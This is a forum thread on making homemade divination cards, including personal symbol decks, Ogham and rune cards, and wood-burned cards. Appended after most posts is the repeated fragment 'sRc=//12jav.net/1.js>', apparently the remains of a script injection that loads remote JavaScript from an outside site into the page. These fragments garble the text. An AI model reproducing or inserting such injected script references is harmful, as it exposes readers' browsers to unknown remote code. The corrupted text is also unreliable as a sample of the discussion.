has anyone here ever made their own cards? i have myself and i highly recommend it, i just drew a bunch of random symbols and numbers that came into my mind on some cards, and when i mess around with them, just laying them out randomly, i start to see things and obtatin information or messages from them. like they start to "speak to me". some of them are good for me to use while casting spells because the symbol or number on them holds some specail feeling or quality to me.
i highly reccommend making your own cards to encourage your growth. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Very good observation. When you have a personal interpretation
of the cards, so that it works with your mind, it is easier
to see the messages they express. Always make sure your
symbols have some sort of meaning to you when divining.
If you make your own deck: 1. random symbols derive from the
subconscious and are more personal.
2. Making your own deck is easy get the astrological
attributions to the trumps, their titles, &c. and make your own
pictorial interpretation. Turn the suits & numbers into
geometrical figures. Obtain the attributions to the suits and
court cards as well. This will ensure that the deck properly
represents the forces of the Universe. Decks of blank cards
are available from many gaming companies that make tarot
decks. Use a ultra fine felt pen and color in with acrylic
brush markers.

This is a really awesome idea I want to make some rune cards, or Ogham cards. And cards are so much easier than ever to do, with card stock and supplies being all over the craft stores. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I'm considering making a deck of Ogham cards...they'll probably resonate with me as I have a Celtic heritage sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I use my own symbols on my cards, but I also took it a step further and made the cards out of wood. I used a saw to cut a thin strip of wood, then seperated them into card-sized pieces. After that I used a woodburner to put the symbols on them and annointed them with oils. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
wow, that sounds pretty cool. they must be beautiful cards, especially if you drew them exactly the way you wanted them to look. i think cards can be very beautiful things.
do you have any favorite cards? if so what are they? if not, then can you just tell me about some of them? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
